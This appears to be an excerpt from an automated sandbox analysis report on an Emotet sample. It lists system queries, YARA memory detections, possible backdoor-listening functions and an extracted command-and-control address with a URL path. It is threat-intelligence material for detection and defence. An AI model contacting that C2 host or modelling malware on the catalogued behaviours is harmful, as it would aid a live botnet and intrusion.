Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\546.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\driverthunk.exe | Queries volume information: C:\ VolumeInformation
Contains functionality to query local / system time
Source: C:\Users\user\546.exe | Code function: 11_2_00426F6E GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter | 11_2_00426F6E
Contains functionality to query time zone information
Source: C:\Users\user\546.exe | Code function: 11_2_00428AE7 __lock,_strlen,_strcat,_strncpy,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,_strncpy | 11_2_00428AE7
Contains functionality to query Windows version
Source: C:\Users\user\546.exe | Code function: 11_2_0040E151 GetVersion,GetEnvironmentVariableW,GetEnvironmentVariableW,InterlockedExchange | 11_2_0040E151
Queries the cryptographic machine GUID
Source: C:\Windows\SysWOW64\wget.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match | File source: 0000000C.00000002.4443946272.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.4392825244.00000000020E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4734087079.0000000000F81000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.4734046172.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4436765350.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.4436809034.0000000000E21000.00000020.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connections (possibly a backdoor)
Source: C:\Users\user\546.exe | Code function: 11_2_00459431 CreateBindCtx,lstrlenW,lstrlenA,CoTaskMemFree | 11_2_00459431
Source: C:\Users\user\546.exe | Code function: 12_2_00459431 CreateBindCtx,lstrlenW,lstrlenA,CoTaskMemFree | 12_2_00459431
Source: C:\Users\user\546.exe | Code function: 12_2_00459A4B lstrlenA,lstrlenW,lstrlenW,lstrlenW,CoTaskMemAlloc,CoTaskMemFree,CreateBindCtx,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree | 12_2_00459A4B

Malware Configuration

Threatname: Emotet

{"C2 list": ["209.146.22.34/cZ0e2Pg5vIvmxy2"]}

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values